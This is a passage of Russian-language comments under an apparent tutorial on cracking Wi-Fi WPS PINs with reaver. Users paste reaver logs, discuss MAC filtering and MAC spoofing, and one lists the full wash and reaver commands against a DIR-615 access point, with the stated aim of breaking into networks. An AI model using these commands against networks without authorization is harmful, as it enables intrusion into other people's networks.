    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 00:25:12:BE:CE:0D
    [!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
    [+] Nothing done, nothing to save.

    • Hub-lex says:

      Следите внимательнее за сообщениями об ошибках. Вот что у вас выдало – [!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
      Это значит вы не смогли “подключиться” к АР. Скорее всего на АР стоит МАС-фильтр.

    • billgilbert says:

      У меня такое показывало двое суток подряд для одной сети с великолепным сигналом. Ни разу не было замечено ни одного подключенного клиента (т. е. и MAC-адрес подменить нечем), видимо, человек фильтры повключал на совесть.

      besside тоже не помог

  • Мурат says:

    это значить я не смогу взломать ..спасибо за внимании
    обязательно Кликну по рекламе..

  • boot says:

    Уровень сигнала -70 dB качество приема 100% но подбор идет ужасно медленно 200 секунд на комбинацию. Проценты идут, есть смысл ждать?

    • Hub-lex says:

      Да имеет смысл ждать.
      Покажите, какие команды вводите.

      • boot says:

        Адаптер dwa-510 на чипе RT2561. Драйвер компилил из пакета compat-wireless, пропали глюки с вафлей, а так же мощность передатчика стала 20dbm (раньше 15 было). Адаптер перевожу в режим мониторинга iwconfig wlan0 mode monitor (почему то при компиляции airmon-ng не собралась). wash -i wlan0 -C показывает одну точку доступа ssid DIR-615 c включенным wps. Ввожу reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c 5 -vv.

        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M1 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0x03), re-trying last pin
        [!] WARNING: 10 failed connections in a row
        [+] Trying pin 01465679
        [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: DIR-615)

        и так далее, очень редко проскакивает

        [!] WPS transaction failed (code: 0x03), re-trying last pin
        [+] 1.42% complete @ 2012-08-17 13:51:40 (393 seconds/pin)
        [+] Trying pin 01465679